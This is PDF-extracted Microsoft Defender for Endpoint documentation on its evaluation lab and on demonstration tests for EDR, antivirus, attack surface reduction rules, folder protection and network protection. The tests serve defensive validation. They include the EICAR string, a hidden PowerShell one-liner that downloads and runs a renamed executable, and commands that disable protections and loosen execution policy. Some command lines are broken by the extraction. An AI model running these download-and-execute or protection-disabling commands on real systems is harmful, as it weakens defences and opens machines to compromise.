You must have Manage security settings permissions to:
Create the lab

Create devices
Reset password
Create simulations
If you enabled role-based access control (RBAC) and created at least a one machine
group, users must have access to All machine groups.
For more information, see Create and manage roles.
Get started with the lab

You can access the lab from the menu. In the navigation menu, select Evaluation and
tutorials > Evaluation lab.
７ Note
Depending the type of environment structure you select, devices will be

available for the specified number of hours from the day of activation.
Each environment is provisioned with a limited set of test devices. When
you've used up the provisioned devices and have deleted them, you can
request for more devices.
You can request for lab resources once a month.
Already have a lab? Make sure to enable the new threat simulators and have active
devices.
Setup the evaluation lab

1. In the navigation pane, select Evaluation & tutorials > Evaluation lab, then select
Setup lab.
2. Depending on your evaluation needs, you can choose to setup an environment

with fewer devices for a longer period or more devices for a shorter period. Select
your preferred lab configuration then select Next.
3. (Optional) You can choose to install threat simulators in the lab.


） Important
You'll first need to accept and provide consent to the terms and information
sharing statements.
4. Select the threat simulation agent you'd like to use and enter your details. You can
also choose to install threat simulators at a later time. If you choose to install
threat simulation agents during the lab setup, you'll enjoy the benefit of having
them conveniently installed on the devices you add.

5. Review the summary and select Setup lab.
After the lab setup process is complete, you can add devices and run simulations.
Add devices
When you add a device to your environment, Defender for Endpoint sets up a well-
configured device with connection details. You can add Windows 10, Windows 11,
Windows Server 2019, Windows Server 2016, and Linux (Ubuntu).
The device will be configured with the most up-to-date version of the OS and Office
2019 Standard as well as other apps such as Java, Python, and SysIntenals.
If you chose to add a threat simulator during the lab setup, all devices will have the
threat simulator agent installed in the devices that you add.
The device will automatically be onboarded to your tenant with the recommended
Windows security components turned on and in audit mode - with no effort on your
side.
The following security components are pre-configured in the test devices:

Block at first sight
Controlled folder access
Exploit protection
Network protection
Potentially unwanted application detection
Cloud-delivered protection
Microsoft Defender SmartScreen
７ Note
Microsoft Defender Antivirus will be on (not in audit mode). If Microsoft Defender

Antivirus blocks you from running your simulation, you can turn off real-time
protection on the device through Windows Security. For more information, see
Configure always-on protection.
Automated investigation settings will be dependent on tenant settings. It will be

configured to be semi-automated by default. For more information, see Overview of
Automated investigations.
７ Note
The connection to the test devices is done using RDP. Make sure that your firewall
settings allow RDP connections.
1. From the dashboard, select Add device.
2. Choose the type of device to add. You can choose to add Windows 10, Windows
11, Windows Server 2019, Windows Server 2016, and Linux (Ubuntu).

７ Note
If something goes wrong with the device creation process, you'll be notified
and you'll need to submit a new request. If the device creation fails, it will not
be counted against the overall allowed quota.
3. The connection details are displayed. Select Copy to save the password for the
device.
７ Note
The password is only displayed once. Be sure to save it for later use.

4. Device set up begins. This can take up to approximately 30 minutes.
5. See the status of test devices, the risk and exposure levels, and the status of
simulator installations by selecting the Devices tab.
 Tip
In the Simulator status column, you can hover over the information icon to
know the installation status of an agent.
Add a domain controller

Add a domain controller to run complex scenarios such as lateral movement and
multistage attacks across multiple devices.
７ Note
Domain support is only available in the Microsoft Defender portal

(security.microsoft.com).
1. From the dashboard, select Add device.
2. Select Windows Server 2019, then select Set as domain controller.
3. When your domain controller has been provisioned, you'll be able to create
domain-joined devices by clicking Add device. Then select Windows 10 / Windows
11, and select Join to domain.
７ Note
Only one domain controller can be live at a time. The domain controller device will
remain live as long as there is a live device connected to it.
Request for more devices

When all existing devices are used and deleted, you can request for more devices. You
can request for lab resources once a month.
1. From the evaluation lab dashboard, select Request for more devices.

2. Choose your configuration.
3. Submit the request.
When the request is submitted successfully you'll see a green confirmation banner and
the date of the last submission.
You can find the status of your request in the User Actions tab, which will be approved
in a matter of hours.
When approved, the requested devices will be added to your lab set up and you'll be
able to create more devices.
 Tip
To get more out of your lab, don't forget to check out our simulations library.
Simulate attack scenarios

Use the test devices to run your own attack simulations by connecting to them.
You can simulate attack scenarios using:
The "Do It Yourself" attack scenarios

Threat simulators
You can also use Advanced hunting to query data and Threat analytics to view reports
about emerging threats.
Do-it-yourself attack scenarios
If you are looking for a pre-made simulation, you can use our "Do It Yourself" attack
scenarios . These scripts are safe, documented, and easy to use. These scenarios will
reflect Defender for Endpoint capabilities and walk you through investigation
experience.
７ Note
The connection to the test devices is done using RDP. Make sure that your firewall
settings allow RDP connections.
1. Connect to your device and run an attack simulation by selecting Connect.
For Linux devices: you'll need to use a local SSH client and the provided command.
７ Note
If you don't have a copy of the password saved during the initial setup, you
can reset the password by selecting Reset password from the menu:

The device will change it's state to "Executing password reset", then you'll be
presented with your new password in a few minutes.
2. Enter the password that was displayed during the device creation step.
3. Run Do-it-yourself attack simulations on the device.
Threat simulator scenarios

If you chose to install any of the supported threat simulators during the lab setup, you
can run the built-in simulations on the evaluation lab devices.
Running threat simulations using third-party platforms is a good way to evaluate

Microsoft Defender for Endpoint capabilities within the confines of a lab environment.
７ Note
Before you can run simulations, ensure the following requirements are met:
Devices must be added to the evaluation lab

Threat simulators must be installed in the evaluation lab
1. From the portal select Create simulation.
2. Select a threat simulator.


3. Choose a simulation or look through the simulation gallery to browse through the
available simulations.
You can get to the simulation gallery from:
The main evaluation dashboard in the Simulations overview tile or

By navigating from the navigation pane Evaluation and tutorials >
Simulation & tutorials, then select Simulations catalog.
4. Select the devices where you'd like to run the simulation on.
5. Select Create simulation.
6. View the progress of a simulation by selecting the Simulations tab. View the
simulation state, active alerts, and other details.
After running your simulations, we encourage you to walk through the lab progress bar
and explore Microsoft Defender for Endpoint triggered an automated investigation
and remediation. Check out the evidence collected and analyzed by the feature.
Hunt for attack evidence through advanced hunting by using the rich query language
and raw telemetry and check out some world-wide threats documented in Threat
analytics.
Simulation gallery
Microsoft Defender for Endpoint has partnered with various threat simulation platforms
to give you convenient access to test the capabilities of the platform right from the
within the portal.
View all the available simulations by going to Simulations and tutorials > Simulations
catalog from the menu.
A list of supported third-party threat simulation agents are listed, and specific types of
simulations along with detailed descriptions are provided on the catalog.
You can conveniently run any available simulation right from the catalog.

Each simulation comes with an in-depth description of the attack scenario and
references such as the MITRE attack techniques used and sample Advanced hunting
queries you run.
Examples:

Evaluation report
The lab reports summarize the results of the simulations conducted on the devices.

At a glance, you'll quickly be able to see:
Incidents that were triggered

Generated alerts
Assessments on exposure level
Threat categories observed
Detection sources
Automated investigations
Provide feedback
Your feedback helps us get better in protecting your environment from advanced
attacks. Share your experience and impressions from product capabilities and evaluation
results.
Let us know what you think, by selecting Provide feedback.


 Tip
Feedback

Microsoft Defender for Endpoint -
demonstration scenarios
Article • 01/23/2024
Applies to:

Microsoft Defender Antivirus
Microsoft Defender for Individuals
The following demonstration scenarios will help you learn about the capabilities of
Microsoft Defender for Endpoint on Windows, Mac, and Linux. Demonstration scenarios
are provided for the following Microsoft Defender for Endpoint protection areas:
Attack surface protection (ASR)

Next Generation Protection (NGP)
Endpoint detection and response (EDR)
７ Note
None of the sample files or suspicious links provided in this collection are actually
malicious; all links and demonstration files are harmless.
We encourage you to read Microsoft Defender Antivirus documentation, and to
download the Evaluation guide.
Demonstrations
The following table lists the available demonstrations alphabetically, with their
associated protection area.
ﾉ Expand table
# Demonstration name Protection Description

area
1 Endpoint Detection and EDR Confirm that EDR is detecting cyber threats
Response (EDR) detections such as malware.
2 Validate antimalware NGP Confirm that antivirus/antimalware is detecting

and blocking malware.
3 Potentially unwanted NGP Confirm that potentially unwanted applications

applications (PUA) (PUAs) are being blocked on your network by
demonstration downloading a fake (safe) PUA file.
4 Cloud-delivered protection NGP Confirm that cloud-delivered protection is

demonstration working properly on your computer.
5 App reputation NGP Navigate to the app reputation page to see the
demonstration demonstration scenario using Microsoft Edge.
6 URL reputation NGP Navigate to the URL Reputation page to see

demonstrations the demonstration scenarios using Microsoft
Edge.
7 Network protection ASR Navigate to a suspicious URL to trigger

demonstrations network protection.
8 Attack surface reduction ASR Download sample files to trigger each ASR
rules (ASR rules) rule.
demonstrations
9 Exploit protection (EP) ASR Apply custom exploit protection settings.

demonstrations
10 Controlled folder access ASR Download the CFA test tool.

(CFA) demonstration (block
script)
# Demonstration name Protection Description
area
11 Controlled folder access ASR Download and execute a sample file to trigger
(CFA) demonstrations (block CFA ransomware protection.
ransomware)
See also
Attack surface protection (ASR) overview Test attack surface reduction rules Next
Generation Protection (NGP) overview Endpoint detection and response (EDR) overview
Microsoft Defender for Endpoint security blog
 Tip
Feedback

SmartScreen app reputation
demonstration
Article • 01/17/2024
Applies to:

Test how Microsoft Defender for Endpoint SmartScreen helps you identify phishing and
malware websites based on App reputation.
Scenario requirements and setup

Windows 11 or Windows 10
Windows Server 2022 or Windows Server 2019 or Windows Server 2016 or
Windows Server 2012 R2 or Windows Server 2008 R2
Microsoft Edge or Internet Explorer browser required
To turn ON/OFF, go to Settings > Update & Security > Windows Security > Open
Windows Security > App & browser control > Check apps and files
Scenario Demos
Known good program

This program has a good reputation; the download should run uninterrupted:
Known good program download
Launching this link should render a message similar to the following:

Unknown program
Because the program download doesn't have sufficient reputation to ensure that it's
trustworthy, SmartScreen will show a warning before running the program download.
Unknown program
Known malware
This download is known malware; SmartScreen should block this program from running.
Known malware

Learn more
Microsoft Defender SmartScreen Documentation
See also
Microsoft Defender for Endpoint - demonstration scenarios
 Tip
Feedback

AV detection test for verifying device's
onboarding and reporting services
Article • 01/31/2024
Applies to:
Windows 11, Windows 10, Windows 8.1, Windows 7 SP1
Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows
Server 2012, and Windows Server 2008 R2
Linux
macOS
Microsoft Defender Real-time protection is enabled
EICAR test file to simulate malware

After you enable Microsoft Defender for Endpoint or Microsoft Defender for Business or
Microsoft Defender Antivirus, you can test the service and run a proof of concept to
familiarize yourself with its feature and validate the advanced security capabilities
effectively protect your device by generating real security alerts.
Run an AV detection test to verify that the device is properly onboarded and reporting
to the service. Perform the following steps on the newly onboarded device:
Windows
1. Prepare for the EICAR test file:
a. Use an EICAR test file instead of real malware to avoid causing damage.
Microsoft Defender Antivirus treats EICAR test files as malware.
2. Create the EICAR test file:
a. Copy the following string: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-

ANTIVIRUS-TEST-FILE!$H+H*
i. Paste the string into a .TXT file and save it as EICAR.txt
Linux/macOS
1. Ensure that real-time protection is enabled (denoted by a result of 1 from running
the following command):
Bash
mdatp health --field real_time_protection_enabled
1. Open a Terminal window. Copy and execute the following command:
Linux
Bash
curl -o ~/tmp/eicar.com.txt https://secure.eicar.org/eicar.com.txt
macOS
Bash
curl -o ~/Downloads/eicar.com.txt https://secure.eicar.org/eicar.com.txt
3. The file has been quarantined by Defender for Endpoint on Mac. Use the following
command to list all the detected threats:
Bash
mdatp threat list
Feedback

demonstrations
Article • 02/16/2024
Applies to:

Attack surface reduction rules target specific behaviors that are typically used by
malware and malicious apps to infect machines, such as:
Executable files and scripts used in Office apps or web mail that attempt to
download or run files
Scripts that are obfuscated or otherwise suspicious
Behaviors that apps undertake that aren't initiated during normal day-to-day work

Windows 11, Windows 10 1709 build 16273 or later
Windows Server 2022, Windows Server 2019, Windows Server 2016, or Windows
Server 2012 R2 with the unified MDE client.
Microsoft 365 Apps (Office; required for Office rules and sample)
Download attack surface reduction PowerShell scripts
PowerShell commands
PowerShell
Add-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-

9B1EEEE46550 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EfC-AADC-
AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-4529-8536-
B80A7769E899 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 75668C1F-73B5-4CF0-BB93-
3ECF5CB7CC84 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids D3E037E1-3EB8-44C8-A917-
57927947596D -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 5BEB7EFE-FD9A-4556-801D-
275E5FFC04CC -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 92E97FA1-2EDF-4476-BDD6-
9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids D1E49AAC-8F56-4280-B9BA-
993A6D77406C -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids B2B3F03D-6A65-4F7B-A9C7-
1C7EF74A9BA4 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids C1DB55AB-C21A-4637-BB3F-
A12568109D35 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-CD74-433A-B99E-
2ECDC07BFC25 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-
b882c64b5ce5 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-
a39ef669e4b2 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-
636979351e5b -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids a8f5898e-1dc8-49a9-9878-
85004b8a61e6 -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49E8-8B27-
EB1D0A1CE869 -AttackSurfaceReductionRules_Actions AuditMode
Add-MpPreference -AttackSurfaceReductionRules_Ids 7674BA52-37EB-4A4F-A9A1-
F0F9A1619A2C -AttackSurfaceReductionRules_Actions AuditMode
Rule states
ﾉ Expand table
State Mode Numeric value
Disabled = Off 0
Enabled = Block mode 1
Audit = Audit mode 2
Verify configuration
PowerShell
Get-MpPreference
Test files
Note - some test files have multiple exploits embedded and triggers multiple rules
ﾉ Expand table
Rule name Rule GUID
Block executable content from email client and webmail BE9BA2D9-53EA-4CDC-84E5-

9B1EEEE46550
Block Office applications from creating child processes D4F940AB-401B-4EFC-AADC-

AD5F3C50688A
Block Office applications from creating executable content 3B576869-A4EC-4529-8536-

B80A7769E899
Block Office applications from injecting into other processes 75668C1F-73B5-4CF0-BB93-

3ECF5CB7CC84
Impede JavaScript and VBScript to launch executables D3E037E1-3EB8-44C8-A917-

57927947596D
Block execution of potentially obfuscated scripts 5BEB7EFE-FD9A-4556-801D-

275E5FFC04CC
Block Win32 imports from Macro code in Office 92E97FA1-2EDF-4476-BDD6-

9DD0B4DDDC7B
{Block Process Creations originating from PSExec & WMI D1E49AAC-8F56-4280-B9BA-

commands 993A6D77406C
Block Execution of untrusted or unsigned executables inside B2B3F03D-6A65-4F7B-A9C7-

removable USB media 1C7EF74A9BA4
Aggressive Ransomware Prevention C1DB55AB-C21A-4637-BB3F-

A12568109D35
Block executable files from running unless they meet a 01443614-CD74-433A-B99E-

prevalence, age, or trusted list criteria 2ECDC07BFC25
Block Adobe Reader from creating child processes 7674ba52-37eb-4a4f-a9a1-

f0f9a1619a2c
Block abuse of exploited vulnerable signed drivers 56a863a9-875e-4185-98a7-

b882c64b5ce5
Block credential stealing from the Windows local security 9e6c4e1f-7d60-472f-ba1a-

authority subsystem (lsass.exe) a39ef669e4b2
Block persistence through WMI event subscription e6db77e5-3df2-4cf1-b95a-

636979351e5b
Block Webshell creation for Servers a8f5898e-1dc8-49a9-9878-

85004b8a61e6
Scenarios
Setup
Download and run this setup script . Before running the script set execution policy to
Unrestricted using this PowerShell command:
PowerShell
Set-ExecutionPolicy Unrestricted
You can perform these manual steps instead:
1. Create a folder under c: named demo, "c:\demo"

2. Save this clean file into c:\demo.
3. Enable all rules using the PowerShell command.
Scenario 1: Attack surface reduction blocks a test file with

multiple vulnerabilities
1. Enable all rules in block mode using the PowerShell commands (you can copy
paste all)
2. Download and open any of the test file/documents, and enable editing and
content, if prompted.
Scenario 1 expected results
You should immediately see an "Action blocked" notification.
Scenario 2: ASR rule blocks the test file with the

corresponding vulnerability
1. Configure the rule you want to test using the PowerShell command from the
previous step.
Example: Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EfC-

AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
2. Download and open the test file/document for the rule you want to test, and
enable editing and content, if prompted.
Example: Block Office applications from creating child processes D4F940AB-
401B-4EFC-AADC-AD5F3C50688A
Scenario 3 (Windows 10 or later): ASR rule blocks

unsigned USB content from executing
1. Configure the rule for USB protection ( B2B3F03D-6A65-4F7B-A9C7-1C7EF74A9BA4 ).
PowerShell

1C7EF74A9BA4 -AttackSurfaceReductionRules_Actions Enabled
3. Download the file and put it on a USB stick and execute it Block Execution of
untrusted or unsigned executables inside removable USB media

Scenario 4: What would happen without attack surface

reduction
1. Turn off all attack surface reduction rules using PowerShell commands in the
cleanup section.
2. Download any test file/document, and enable editing and content, if prompted.
The files in c:\demo are encrypted and you should get a warning message
Execute the test file again to decrypt the files
Clean-up
Download and run this clean-up script
Alternately, you can perform these manual steps:
PowerShell
Add-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-

9B1EEEE46550 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EfC-AADC-
AD5F3C50688A -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-4529-8536-
B80A7769E899 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 75668C1F-73B5-4CF0-BB93-
3ECF5CB7CC84 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids D3E037E1-3EB8-44C8-A917-
57927947596D -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 5BEB7EFE-FD9A-4556-801D-
275E5FFC04CC -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 92E97FA1-2EDF-4476-BDD6-
9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids D1E49AAC-8F56-4280-B9BA-
993A6D77406C -AttackSurfaceReductionRules_Actions Disabled
1C7EF74A9BA4 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids C1DB55AB-C21A-4637-BB3F-
A12568109D35 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-CD74-433A-B99E-
2ECDC07BFC25 -AttackSurfaceReductionRules_Actions Disabled
b882c64b5ce5 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-
a39ef669e4b2 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-
636979351e5b -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids a8f5898e-1dc8-49a9-9878-
85004b8a61e6 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 26190899-1602-49E8-8B27-
EB1D0A1CE869 -AttackSurfaceReductionRules_Actions Disabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 7674BA52-37EB-4A4F-A9A1-
F0F9A1619A2C -AttackSurfaceReductionRules_Actions Disabled
Clean up c:\demo encryption by running the encrypt/decrypt file
See also
Attack surface reduction rules deployment guide
Attack surface reduction rules reference
 Tip
Feedback

demonstration
Article • 01/16/2024
Applies to:

Cloud-delivered protection for Microsoft Defender Antivirus, also referred to as

Microsoft Advanced Protection Service (MAPS), provides you with strong, fast protection
in addition to our standard real-time protection.

Windows 11, Windows 10, Windows 8.1, and Windows 7 SP1
Microsoft Defender Real-time protection is enabled
Cloud-delivered protection is enabled by default, however you may need to re-
enable it if it has been disabled as part of previous organizational policies. For
more information, see Enable cloud-delivered protection in Microsoft Defender
Antivirus.
You can also download and use the PowerShell script to enable this setting and
others on Windows 10 and Windows 11.
Scenario
1. Download the test file . Important: The test file isn't malicious, it's just a harmless
file simulating a virus.
2. If you see file blocked by Microsoft Defender SmartScreen, select on "View

downloads" button.
3. In Downloads menu right select on the blocked file and select on Download
unsafe file.
4. You should see that "Microsoft Defender Antivirus" found a virus and deleted it.
７ Note
In some cases, you might also see Threat Found notification from Microsoft
Defender Security Center.
5. If the file executes, or if you see that it was blocked by Microsoft Defender
SmartScreen, cloud-delivered protection isn't working. For more information, see
Configure and validate network connections for Microsoft Defender Antivirus.
See also
Utilize Microsoft cloud-delivered protection in Microsoft Defender Antivirus
 Tip
Feedback

Controlled folder access (CFA)
demonstration test tool (block script)
Article • 07/18/2023
Applies to:

Controlled Folder Access helps you protect valuable data from malicious apps and
threats, such as ransomware. All apps (any executable file, including .exe, .scr, .dll files
and others) are assessed by Microsoft Defender Antivirus, which then determines if the
app is malicious or safe. If the app is determined to be malicious or suspicious, then it
will not be allowed to make changes to any files in any protected folder.

Windows 10 1709 build 16273
Microsoft Defender Antivirus (active mode)
PowerShell commands
PowerShell
Set-MpPreference -EnableControlledFolderAccess <State>
Rule states
ﾉ Expand table
Disabled = Off 0
PowerShell
Get-MpPreference
Scenario
Setup
PowerShell
1. Turn on CFA using PowerShell command:
PowerShell
Set-MpPreference -EnableControlledFolderAccess Enabled
2. Download the CFA test tool

3. Execute the PowerShell commands above
Scenario: Use the CFA test tool to simulate an

untrusted process writing to a protected folder
1. Launch CFA test tool
2. Select the desired folder and create file
You can find more information here.
Clean-up
Download and run this cleanup script . You can perform these manual steps instead:
PowerShell
Set-MpPreference -EnableControlledFolderAccess Disabled
See also
 Tip
Feedback

Controlled folder access (CFA)
demonstrations (block ransomware)
Article • 02/16/2024
Applies to:

Controlled folder access helps you protect valuable data from malicious apps and
threats, such as ransomware. Microsoft Defender Antivirus assesses all apps (any
executable file, including .exe, .scr, .dll files and others) and then determines if the app is
malicious or safe. If the app is determined to be malicious or suspicious, then the app
can't make changes to any files in any protected folder.

Windows 10 1709 build 16273
Microsoft Defender Antivirus (active mode)
PowerShell commands
PowerShell
Set-MpPreference -EnableControlledFolderAccess (State)
PowerShell
Set-MpPreference -ControlledFolderAccessProtectedFolders C:\demo\
Rule states
ﾉ Expand table
Disabled = Off 0

PowerShell
Get-MpPreference
Test file
CFA ransomware test file
Scenarios
Setup
PowerShell
1. Create a folder under c: named demo, "c:\demo".
2. Save this clean file into c:\demo (we need something to encrypt).
3. Execute PowerShell commands listed earlier in this article.
Scenario 1: CFA blocks ransomware test file

1. Turn on CFA using PowerShell command:
PowerShell

2. Add the demo folder to protected folders list using PowerShell command:
PowerShell
Set-MpPreference -ControlledFolderAccessProtectedFolders C:\demo\
3. Download the ransomware test file

4. Execute the ransomware test file *this isn't ransomware, it simple tries to encrypt
c:\demo
5 seconds after executing the ransomware test file you should see a notification CFA
blocked the encryption attempt.
Scenario 2: What would happen without CFA

1. Turn off CFA using this PowerShell command:
PowerShell
2. Execute the ransomware test file
The files in c:\demo are encrypted and you should get a warning message
Execute the ransomware test file again to decrypt the files
Clean-up
Download and run this cleanup script . You can perform these manual steps instead:
PowerShell
Clean up c:\demo encryption by using the encrypt/decrypt file

See also
 Tip
Feedback

EDR detection test for verifying device's
onboarding and reporting services
Article • 01/16/2024
Applies to:

Windows 11, Windows 10 version 1709 build 16273 or newer, Windows 8.1, or
Windows 7 SP1.
Server 2012 R2, and Windows Server 2008 R2 SP1.
Linux
macOS
Endpoint detection and response for Endpoint provide advanced attack detections that
are near real-time and actionable. Security analysts can prioritize alerts effectively, gain
visibility into the full scope of a breach, and take response actions to remediate threats.
Run an EDR detection test to verify that the device is properly onboarded and reporting
to the service. Perform the following steps on the newly onboarded device:
Windows
1. Open a Command Prompt window
2. At the prompt, copy and run the command below. The Command Prompt window
will close automatically.
PowerShell
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden

$ErrorActionPreference= 'silentlycontinue';(New-Object
System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-
WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
3. If successful, the detection test will be marked as completed and a new alert will
appear in few minutes.
Linux
1. Download script file to an onboarded Linux server
Bash
curl -o ~/Downloads/MDE Linux DIY.zip https://aka.ms/LinuxDIY
1. Extract the zip
Bash
unzip ~/Downloads/MDE Linux DIY.zip
1. And run the following command:
Bash
./mde_linux_edr_diy.sh
After a few minutes, a detection should be raised in Microsoft Defender XDR.
3. Look at the alert details, machine timeline, and perform your typical investigation
steps.
macOS
1. In your browser, Microsoft Edge for Mac or Safari, download MDATP MacOS DIY.zip
from https://aka.ms/mdatpmacosdiy and extract.
The following prompt appears:
Do you want to allow downloads on

"mdatpclientanalyzer.blob.core.windows.net"?
You can change which websites can download files in Websites Preferences.
2. Click Allow.
3. Open Downloads.
4. You must be able to see MDATP MacOS DIY.
 Tip
If you double-click MDATP MacOS DIY, you will get the following message:
"MDATP MacOS DIY" cannot be opened because the developer cannot

be verifier.
macOS cannot verify that this app is free from malware.
[Move to Trash] [Cancel]
5. Click Cancel.
6. Right-click MDATP MacOS DIY, and then click Open.
The system displays the following message:
macOS cannot verify the developer of MDATP MacOS DIY. Are you sure you
want to open it?
By opening this app, you will be overriding system security which can expose
your computer and personal information to malware that may harm your Mac
or compromise your privacy.
7. Click Open.
The system will display the following message:
Microsoft Defender for Endpoint - macOS EDR DIY test file

Corresponding alert will be available in the MDATP portal.
8. Click Open.
In few minutes, an alert macOS EDR Test Alert is raised.
9. Go to Microsoft Defender portal (https://security.microsoft.com/ ).
10. Go to the Alert Queue.

The macOS EDR test alert shows severity, category, detection source, and a
collapsed menu of actions.
Look at the alert details and the device timeline, and perform the regular
investigation steps.
Next steps that you can consider performing are to add AV exclusions as needed for
application compatibility or performance:
Configure and validate exclusions for Microsoft Defender for Endpoint on macOS
Address false positives/negatives in Microsoft Defender for Endpoint
Manage suppression rules
Create indicators of compromise (IoC)
Create and manage custom detections rules
Read through Microsoft Defender for Endpoint Security Operations Guide.
Feedback

Exploit protection (EP) demonstrations
Article • 01/16/2024
Applies to:

Exploit Protection automatically applies exploit mitigation settings system wide and on
individual apps. Many of the features in the Enhanced Mitigation Experience Toolkit
(EMET) have been included in Exploit Protection, and you can convert and import
existing EMET configuration profiles into Exploit Protection.

Windows 11 or Windows 10 1709 build 16273 or newer
Windows Server 2022, Windows Server 2019, and Windows Server 2016.
Run PowerShell commands:
PowerShell
Set-ProcessMitigation -PolicyFilePath ProcessMitigation.xml
PowerShell
Set-ProcessMitigation –help
PowerShell
Get-ProcessMitigation
Sample xml file

EP xml config file (right select, "save target as")
Scenario
Scenario 1: Convert EMET xml to Exploit Protection

settings
1. Convert EMET to xml, run PowerShell command:
PowerShell
ConvertTo-ProcessMitigationPolicy
2. Apply settings, run PowerShell command: use the XML from the prior step
PowerShell
Set-ProcessMitigation -PolicyFilePath
3. Confirm settings were applied, run PowerShell command:
PowerShell
4. Review the event log for application compatibility
Scenario 2: Apply selfhost xml to Exploit Protection

settings
1. Download our EP xml config file (right select, "save target as") or use your own
2. Apply settings, run PowerShell command:
PowerShell
Set-ProcessMitigation -PolicyFilePath ProcessMitigation.xml
3. Confirm settings were applied, run PowerShell command:
PowerShell
4. Review the event log for application compatibility
See also
Exploit Protection
 Tip
Feedback

Network protection demonstrations
Article • 01/18/2024
Applies to:

Network Protection helps reduce the attack surface of your devices from Internet-based
events. It prevents employees from using any application to access dangerous domains
that may host phishing scams, exploits, and other malicious content on the Internet.

Windows 11 or Windows 10 version 1709 build 16273 or newer.
Windows Server 2022, Windows Server 2019, Windows Server 2016, and Windows
Server 2012 R2 with the new unified MDE Client.
macOS
Linux
Windows
PowerShell command
PowerShell
Set-MpPreference -EnableNetworkProtection Enabled
Rule states
ﾉ Expand table
Disabled = Off 0

PowerShell
Get-MpPreference
Scenario
1. Turn on Network Protection using powershell command:
PowerShell
2. Using the browser of your choice (not Microsoft Edge*), navigate to the Network
Protection website test . Microsoft Edge has other security measures in place to
protect from this vulnerability (SmartScreen).
Expected results
Navigation to the website should be blocked and you should see a Connection blocked
notification.
Clean-up
PowerShell
Set-MpPreference -EnableNetworkProtection Disabled
macOS/Linux
To configure the Network Protection enforcement level, run the following command
from the Terminal:
Bash
mdatp config network-protection enforcement-level --value [enforcement-

level]
For example, to configure network protection to run in blocking mode, execute the
following command:
Bash
mdatp config network-protection enforcement-level --value block
To confirm that network protection has been started successfully, run the following
command from the Terminal, and verify that it prints "started":
Bash
mdatp health --field network_protection_status
To test Network Protection on macOS/Linux
1. Using the browser of your choice (not Microsoft Edge*), navigate to the Network
Protection website test . Microsoft Edge has other security measures in place to
protect from this vulnerability (SmartScreen).
2. or from terminal
Bash
curl -o ~/Downloads/smartscreentestratings2.net
https://smartscreentestratings2.net/
Expected results
Navigation to the website should be blocked and you should see a Connection blocked
notification.
Clean-up
Bash
mdatp config network-protection enforcement-level --value audit
See also
Network Protection
 Tip
Feedback

Potentially unwanted applications (PUA)
demonstration
Article • 01/16/2024
Applies to:

The Potentially Unwanted Applications (PUA) protection feature in Microsoft Defender

Antivirus can identify and block PUAs from downloading and installing on endpoints in
your network. These applications aren't considered viruses, malware, or other types of
threats, but might perform actions on endpoints that adversely affect their performance
or use.

Windows 11 or Windows 10
Server 2012 R2, and Windows Server 2008 R2 SP1
macOS
Linux
Enable PUA protection. For more information, see the Detect and block Potentially
Unwanted Applications article.
You can also download and use the PowerShell script to enable this setting and
others.
Scenario
